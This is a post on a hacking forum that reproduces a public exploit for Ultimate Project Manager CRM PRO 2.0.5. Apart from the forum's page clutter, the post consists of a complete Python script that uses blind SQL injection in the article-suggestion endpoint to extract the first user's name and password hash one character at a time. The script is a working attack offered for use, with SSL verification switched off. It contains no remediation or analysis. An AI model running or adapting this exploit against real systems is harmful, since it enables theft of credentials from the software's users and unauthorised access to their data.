Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Ultimate Project Manager CRM PRO Version 2.0.5 - SQLi (Authenticated)

 Share


Recommended Posts

# Exploit Title: Ultimate Project Manager CRM PRO 2.0.5 - SQLi Credentials Leakage
# Date: 2020-16-09
# Exploit Author: nag0mez
# Vendor Homepage: https://ultimatepro.codexcube.com/
# Version: <= 2.0.5
# Tested on: Kali Linux 2020.2


# The SQLi injection does not allow UNION payloads. However, we can guess usernames and passwords fuzzing the database.

#!/usr/bin/env python3
#-*- coding: utf-8 -*-
import requests
import sys

# The original vulnerability was found on a server with an invalid SSL certificate,
# which Python could not verify. I added the verify=False parameter to avoid SSL check.
# The lack of verification results in a warning message from Python.
# To get a clean output, we will ignore all warnings.
import warnings
warnings.filterwarnings("ignore")

host = 'https://testurl.test' # Change
url = "{}/frontend/get_article_suggestion/".format(host)

chars = '1234567890abcdefghijklmnopqrstuvwxyz'
hex_chars = 'abcdef1234567890'

def send_payload(payload):
	try:
		response = requests.post(url, data=payload, verify=False)
		content = response.text
		length = len(content)
		return length
	except Exception as e:
		print('Cannot connect to host. Exit.')
		sys.exit(1)
	

def get_first_user():
	found = True
	known = ''

	while found:

		found = False
		for c in chars:
			test = known + c
			payload = {'search': "' or (select username from tbl_users limit 1)like'{}%'-- ".format(test)}
			length = send_payload(payload)

			if length > 2:
				found = True
				known += c
				print(c, end='')
				sys.stdout.flush()
				break

	return known

def get_hash(username):
	found = True
	known = ''

	while found:

		found = False
		for c in hex_chars:
			test = known + c
			payload = {'search': "' or (select password from tbl_users where username='{}' limit 1)like'{}%'-- ".format(username,test)}
			length = send_payload(payload)

			if length > 2:
				found = True
				known += c
				print(c, end='')
				sys.stdout.flush()
				break

	return known


if __name__ == '__main__':
	print('Exploit started.')
	print('Guessing username...')

	username = get_first_user()

	if username != '':
		print('\nUsername found: {}'.format(username))
	else:
		print('\nCould not get username! Exit.')
		sys.exit(1)

	print('Guessing password SHA512 hash...')

	sha = get_hash(username)

	if sha != '':
		print('\nHash found: {}'.format(sha))
	else:
		print('\nCould not get Hash! Exit.')
		sys.exit(1)
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...